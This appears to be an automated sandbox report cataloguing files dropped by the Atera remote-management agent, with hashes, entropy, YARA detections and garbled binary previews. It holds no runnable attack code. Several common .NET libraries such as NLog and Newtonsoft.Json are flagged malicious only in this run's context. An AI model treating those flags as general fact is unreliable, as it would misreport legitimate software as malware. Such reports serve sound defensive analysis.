                                                                                                                                                                                                                                                                                              Preview:PK..-.....}BrX.j5.........-...AgentPackageADRemote/AgentPackageADRemote.exe....0........d......0.....r...,.. UMA...|f-].=.U.j..p.....r..f.<..Z..g}m..LC.T.....Y.{s\.k... Y.....4..}..h.<L......L.........z.i9.K..~.ue."#"r.r..p..0.\./R...C.w..8..-.3.t...(.c..P..N....q.v&........u.a.e...]...9....r.@.=\v..B.~{|c.j.S...JL!g..Y@Ts9D$...)P.......{..8...Y...K...Z._".@.....a.8.P..7...ZY.-D8f\..ej.....@.w.$R>Q.B.....V..@..9....zdB..x..GK.....LDp...Xc......x......*.u..R..,...#...Q,.V....}..W....oT.._6n.g..bK.p.s...pABSv0.7..'.JK ....b.Y.-.B...!'Tjsn...."V......B.@.<CQ.K....>D.5E..w.'. ._%E..-......7.M..u1nr.7....T[.%6..t...Z..Q.;./....k.V....J-.\`..d...K.c. ..D.G.j.../..z..k.KH.....!..M...8....fr.......m....2..4-... ..CF...skN*.kv.E[3."gi3.Uv..*.S...n..~...)..!V..>...D..2..b..}..xW.ZPd..X\.g...1.RY.u.]p..Z b%r.....Hc.N.+[E...Q....3.K.H.....)NQ@L......./2.v..q...*.-:%... "...`...i..+!.D..q.];.ARRrQZ.B. i...M...Qy$.....p...A.U...=...LHF%...]..l.S.pl1....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.139785828189609
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:avB4oeg/Po2Obb95bmrpeALHpZAgEpYinAMxCC8:ruQpbHbklAp7Hxx8
                                                                                                                                                                                                                                                                                              MD5:3180C705182447F4BCC7CE8E2820B25D
                                                                                                                                                                                                                                                                                              SHA1:AD6486557819A33D3F29B18D92B43B11707AAE6E
                                                                                                                                                                                                                                                                                              SHA-256:5B536EDA4BFF1FDB5B1DB4987E66DA88C6C0E1D919777623344CD064D5C9BA22
                                                                                                                                                                                                                                                                                              SHA-512:228149E1915D8375AA93A0AFF8C5A1D3417DF41B46F5A6D9A7052715DBB93E1E0A034A63F0FAAD98D4067BCFE86EDB5EB1DDF750C341607D33931526C784EB35
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0................. ........@.. ...................................`.................................p...O.......................0(.............8............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........B...s............................................................(....*.0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..(....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*.0..........s....%.o...+o....o...+&%.o...+o....o...+&%.o...+o....o...+&%.o...+o!...o...+&%.o...+o#...o...+&%.o...+o%...o...+&%.o...+o...+&%.o...+o(...o...+&%(*...%.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1782
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.026919218581437
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3rrb7h+1/gYo27RgdSagFsg+w3Sg+CjdgDt:7rn4cwCR
                                                                                                                                                                                                                                                                                              MD5:13CFEB2261E4DAEAA3C06F7A60078F91
                                                                                                                                                                                                                                                                                              SHA1:D76B6D07D8FEC75789025FBAB18048AD193B1462
                                                                                                                                                                                                                                                                                              SHA-256:6BBDCC477F0C1EFBD0129AC7716F96CC2844103169AAEBFF03D4C8F5C54745D6
                                                                                                                                                                                                                                                                                              SHA-512:F804155363FEB09427F7C8E968EAAA7DDA15F739769864A23C8A0FC9137151A03F02FB30B11F47A69DDCEFFF02BF933721C3757A3FB78C705D0537205BBD3A92
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhTLV:WFLV
                                                                                                                                                                                                                                                                                              MD5:530F2E4E5E3DDA283DB3C78CC0C13297
                                                                                                                                                                                                                                                                                              SHA1:CF60B778D32C9562B94411DA9DCD8FED2017AB84
                                                                                                                                                                                                                                                                                              SHA-256:447163A4A3F1F10AFD9EC48F915085B3236F0FA7EDC9973C16925EDB5F6CF0CC
                                                                                                                                                                                                                                                                                              SHA-512:DD4F7AF9A0F57707D1924BB504D3FC267B4898B909CF6E6ECD274BBC9B487A5CE5D8000E3FAD6EC0061E565C728455965C91F1B4E380227264AD2EE3E2990E28
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=6.0

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95792
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.184818983275012
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:GQ7brNBoXFbuhpLHbTOgemUu7+n3uRw1FlQRd5JY4t5K56y0sDrUfvPrhZwLXF7X:GQ/iwLWgeW+neRw1Hyd/YCs56y0sXUfG
                                                                                                                                                                                                                                                                                              MD5:23C8674C75D5944445BF1C035E4A4789
                                                                                                                                                                                                                                                                                              SHA1:A1255CEDEAC9F9A04B50C7814CD7C61A50623A19
                                                                                                                                                                                                                                                                                              SHA-256:D2043F878740F643BF91F3EF798DBB9747904A1D503AAC4ED2108131F663AB37
                                                                                                                                                                                                                                                                                              SHA-512:52ABA8350A05E9E5A672CB04CE528CFC4DA009247B2BD8B63096AF9A37C1F352A4C2BD12B03973AA1E733551F94F542814E425223DEF2AA33B595AA2DC555A95
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Bd.........." ..0..D...........b... ........... ...............................{....`..................................b..O.......8............N..0(..........la............................................... ............... ..H............text....B... ...D.................. ..`.rsrc...8............F..............@..@.reloc...............L..............@..B.................b......H........j..l............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tQ...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.002764283325334
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:ocNQW9Tbp/VgiZi7sT5gdBxYJMcTnbJkI+eD7HxSR:ojobJVgiHMcr5Da
                                                                                                                                                                                                                                                                                              MD5:10961147A546FFCD8B7C19771BA70198
                                                                                                                                                                                                                                                                                              SHA1:5B63EEA0B2E53DB81AFB146D469E899E1E67DACF
                                                                                                                                                                                                                                                                                              SHA-256:95C53735107ADCC39E6C3268335B2AD434E2364A007CC97B2147AF3A6EE837F3
                                                                                                                                                                                                                                                                                              SHA-512:9830450FF9E8D2E6B74D8D8938A18DFB1BA008249D389FB923D5AAA25B7F8F9E5BAD4CB3FC13100C5F53B0CCEDA4E9427E90F2B733EA9BE0FFAA5D5F165C815E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............" ..0..B..........Za... ........... ..............................~.....`..................................a..O....................L..0(..........``..8............................................ ............... ..H............text...`A... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................9a......H.......4i..,.............................................................(......}......}.......}.......}........o?...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po#...o....*..{....o2...r...p.(....(....o(...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16432
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.656654225594367
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:5Xh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl5XqQ:5Xh+tYmNyb8E9VF6IYinAM+oCaFXF
                                                                                                                                                                                                                                                                                              MD5:96703E15C375B8A701C9D1F5BE8C4149
                                                                                                                                                                                                                                                                                              SHA1:B058FA32FBDA52D70C1B966640B4824D5487ADC4
                                                                                                                                                                                                                                                                                              SHA-256:3F830FA8F22EB09D59088705E26DCE964FB430722E91630B03EB15FCC48359A0
                                                                                                                                                                                                                                                                                              SHA-512:3D7515BBFD018BCB24C69235A65F401BCF00D6932E412696FF31DC6EDE9436B2D4E5983450C9F88AF7B52D18949B4C1EFFEB9C3F94E85DCE57C4495F21D21A86
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ....................................@.................................",..O....@..(...............0(...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.410547751816252
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:KQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAM/:K9ML8LW/usybGYVE8mZw+89Wu1e7Hxas
                                                                                                                                                                                                                                                                                              MD5:20FC2DB17D09554BBC37785B3644DFC3
                                                                                                                                                                                                                                                                                              SHA1:AAC4CA54730DB46145748AB419CF6BE3B39D2A74
                                                                                                                                                                                                                                                                                              SHA-256:4151D6C627A324D9F2991A4D98BB7544926DB41B3211EDC1B2085922B1D1FC46
                                                                                                                                                                                                                                                                                              SHA-512:62F6711FD2861BEA0FC214882678CF7F98CB53E8AF858C46CCC1F5B1F2FF9C22DCBD3A184A9DE9AD2D2148F0B529426DE7F793A63A459D72D2DCB048DF4E40FD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&............." ..0.................. ........... ..............................&.....`.................................>...O.......4...............0(..........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................r.......H........E...s...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....P.........io ...&..i.X.P..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....P......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398896
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.13440642371392
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:hjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvr:h+e55LgIkTmyAAfTnMLvr
                                                                                                                                                                                                                                                                                              MD5:A79C5395D945A1A369EA05D73B1170E4
                                                                                                                                                                                                                                                                                              SHA1:937D030106FD7E88B61E4F4D1AC28A3B9FFA0AA4
                                                                                                                                                                                                                                                                                              SHA-256:7580F72E7059A9DBCF41C94DC69ECCA0B3A983C010DE86B9A509A701163AFEC0
                                                                                                                                                                                                                                                                                              SHA-512:176C719C2595A6A01041EC240D5341FAC5AB6137756FD70F71A1B5C5A6E9A923FB61760808840D439CDBAB70ADFAEE137B13600875E0BC3A209E501DB84C2AAD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`.......^....`.................................v...O.... ..................0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071525670553409
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Y1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQm:Y1n1p9LdRN39aQZUq3
                                                                                                                                                                                                                                                                                              MD5:022108AD251A8942E295269CA824DE07
                                                                                                                                                                                                                                                                                              SHA1:05CE96EB21FF69C5ACE572405A39936E594B7043
                                                                                                                                                                                                                                                                                              SHA-256:353FC27D930C31219086C6D391B0502AC298F6084DFCB3EA423DD1DAB3BA1907
                                                                                                                                                                                                                                                                                              SHA-512:49028D3C1C7C8FAE813F294577B97EB0C66F2D62DF880072AD59679460D55A6DEB1546DDF07A7353563910E21F4D53F5FCB4BD421887D7B75429083CA200C16E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ....................................`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960711597816388
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:yBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUc:yBjk38WuBcAbwoA/BkjSHXP36RMGl
                                                                                                                                                                                                                                                                                              MD5:25879E885A79F4548FD878EAF4A82396
                                                                                                                                                                                                                                                                                              SHA1:AFB8D0BBD5687D2FC19C7A3FB66EA3DF1886DB8C
                                                                                                                                                                                                                                                                                              SHA-256:3DF7B27F8649C95C56F1F68A040F29FB28EFF6756F8BA78C480DFBB541E59E4A
                                                                                                                                                                                                                                                                                              SHA-512:39EB28B89A077D37FC8076A364B26ADFD348F6DC891AC08FACCFB071D3806C32AC0A3A5D82E8D4DE01DF6F9E1C4271CCABFA8FF7248CF6886BEF8FE4BDE51B6F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......5.....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284208
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.117274836584594
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:NZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHU:fgo0WPVTXg0
                                                                                                                                                                                                                                                                                              MD5:66DEBCC5962642D31706EA1B067288A3
                                                                                                                                                                                                                                                                                              SHA1:FB6A76C0E5189F66FE1D0E192349077A45BF437F
                                                                                                                                                                                                                                                                                              SHA-256:8CBC47B453EA20F1EEA3337981A1A975A16B68B27AA156831D2B4AD0B63EA980
                                                                                                                                                                                                                                                                                              SHA-512:5C485C7D319BA9C019FBDCA48833D3628E6D9EA6F3AABFA47A519C363BA81D11265427FD470D5D665795B010A26E751DA404DBD70895E5EAFC83CBD50D83ED2B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22064
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.676829122620627
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqXLP:TuhMaVmzDC67EpYinAMxC5
                                                                                                                                                                                                                                                                                              MD5:C3CBDF33261AA0BAA8C11B4D713BA911
                                                                                                                                                                                                                                                                                              SHA1:A486A2CFA6EF16B9DD005C689C767E47BF18D5A6
                                                                                                                                                                                                                                                                                              SHA-256:0BD8B6B5D401001A2003486077BC095A2138B42DE7A52B212BD7A4AAD72A9E35
                                                                                                                                                                                                                                                                                              SHA-512:132600340186128C7B8EA40D77DE9E5359A52949E7EE815CF959E2000A6EE178FCE26A2AAA2EBC56A48318EEAD3038189567CD5D14F9E977780373649C83F41D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):97328
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.241615255803021
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:rNSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxhP:rN3OWMsQ56vd2s+KuYc9RTJrP
                                                                                                                                                                                                                                                                                              MD5:259DAAE7BD386F6AE1C50DEF93F9A274
                                                                                                                                                                                                                                                                                              SHA1:70E68497781C4E7B931B11E9EFE702ECCFBC3AF7
                                                                                                                                                                                                                                                                                              SHA-256:859758492E07C9297C1C5A0A31FA30129C23D479F442ADE01F4A51F78A0DED08
